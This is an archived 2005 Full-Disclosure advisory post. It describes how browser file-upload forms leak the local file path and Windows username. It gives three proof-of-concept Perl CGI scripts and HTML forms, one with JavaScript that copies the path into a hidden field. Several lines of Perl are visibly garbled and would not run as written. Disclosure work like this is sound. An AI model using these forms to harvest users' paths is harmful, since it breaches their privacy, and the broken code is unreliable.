OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[Full-Disclosure] Multi browser sensitive information disclosure

From: bitlance winter (bitlance_3hotmail.com)
Date: Fri Mar 04 2005 - 02:14:24 CST


Multi browser sensitive information disclosure

I. DESCRIPTION:

Mr.upken disclosed this issue publicly on 19th Feb. 2005.
Here is his advisory.(language is Japanese)
http://xxx.upken.jp/report/ieup/
I have a few additional details to add to his original advisory.

II. IMPACT:

Disclosure of sensitive information to an unauthorised user.

III. TECHNICAL DETAILS:

RFC1867 is the standard definition of that "Browse..." button
that you use to upload files to a Web server.
It introduced the INPUT field type="file", which is that button,
and also specified a multipart form encoding which is capable of
encapsulating files for upload along with all the other fields
on an upload form.

As Mr.upken has mentioned in his advisory, there is a weakness in
"Form-based File Upload in HTML".
"When we use InternetExplorer" , he says ,"secret or sensitive
information can be exposed by an malicious people."

I have tested some examples, and it is found that Firefox, Opera,
and InternetExplorer have a weakness.( tested on WindowsXPSp2 )

IV. Proof of Concept [A].

server-side Perl CGI.(ask.cgi)
- ---------------------------
#!/usr/bin/perl
print "Content-Type: text/html\n\n";

die if $ENV{CONTENT_LENGTH} > 100*1024;

$objectname = "RFC1867";
$boundary = <STDIN>;
$boundary =~s /\r\n//;
while(<STDIN>){
  if($_ =~ /$objectname/){
    ~s/\r\n//;
    ~s/"//g;
    dum = split(/filename=/, $_);
    $rfc1867 = $dum[dum - 1];
  }
}
&Filtertxt( $rfc1867 );
print "$rfc1867\n";

exit(0);

sub Filtertxt {
    local( $ft ) = _;
    $fd =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
    return( $ft ) ;
}
- ---------------------------

client-side FORM.
- ---------------------------
<form name="XA" method="POST" enctype="multipart/form-data"
action="http://example.com/cgi-bin/ask.cgi">
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload">
</form>
- ---------------------------

NOTE:
Method is "POST".
When we upload a some file,
%USERNAME% , Path, etc... is disclosed.
I guess that only IE has a weakness.

V. Proof of Concept [B].

server-side Perl CGI.(named ask2.cgi)
- ---------------------------
#!/usr/bin/perl

if($ENV{'REQUEST_METHOD'} eq 'POST'){
#reads inputted variables through POST
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
}
else{
#reads inputted variables through GET
$buffer = $ENV{'QUERY_STRING'};
}

#splits the variables at &
pairs = split(/&/, $buffer);
foreach $pair (pairs) {
#sets the value and name of each var
($name, $value) = split(/=/, $pair);
#makes each + into a space
$value =~ tr/+/ /;
#URL decode
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
#filter out bad characters & # < > " '
$value = &Filtertxt( $value );
#sets the varibles in a hash
$FORM{$name} = $value;
}

#print html .
print "Content-Type: text/html\n";
print "\n";
print "$FORM{'XB'}\n";
print "<br>\n";
print "$FORM{'RFC1867'}\n";

exit(0);

sub Filtertxt {
    local( $ft ) = _;
    $fd =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
    return( $ft ) ;
}
- ---------------------------

client-side FORM.
- ---------------------------
<form name="XA" method="GET" enctype="multipart/form-data"
action="http://example.com/cgi-bin/ask2.cgi">
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload">
</form>
- ---------------------------

NOTE:
Method is "GET".
When we try to upload a some file,
%USERNAME% , Path, etc... is disclosed.
I guess that both Opera and IE have a weakness.

V. Proof of Concept [C].
server-side Perl CGI is as same as Proof of Concept [B].

client-side FORM.
- ---------------------------
<form name="XA" method="GET" enctype="multipart/form-data"
action="http://example.com/cgi-bin/ask2.cgi">
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload"
onclick="document.XA.XB.value=document.XA.RFC1867.value;return true" >
</form>
- ---------------------------

NOTE:
Method is "GET".
When we try to upload a some file,
%USERNAME% , Path, etc... is disclosed.
I guess that all Firefox,Opera and IE have a weakness,
using evil JavaScript scripting.

VI. Other browser on Other OS.
not tested. But......

VII. Is this a vulnerability?

At once I had used InternetExplore as a FTP tool.
Today, when I am testing PoC3, browsing upload file,
using Firefox , I find
"MyNetwork - ftp02.websamba.com - mhtmlbug - scriptkitty.jpg"
and upload it to another server.
Then my monitor displays
C:\Documents and Settings\%USERNAME%\Local Settings\
Temporary Internet Files\Content.IE5\YB6J6PY3\scriptkitty[4].jpg

Oh,no. YB6J6PY3 !
It is no matter. I guess this is NOT a vulnerability, maybe.

VIII. Workaround

Do not upload any file onto untrusted server.
Do not attach any file ( while sending WebMAIL, posting ML,etc).
With killing JavaScript , use Firefox.

VIII. Credit

Discovery: upken
Additional Research: bitlance winter

BEST REGARDS.

--
bitlance winter

_________________________________________________________________
Donít just search. Find. Check out the new MSN Search!
http://search.msn.click-url.com/go/onm00200636ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html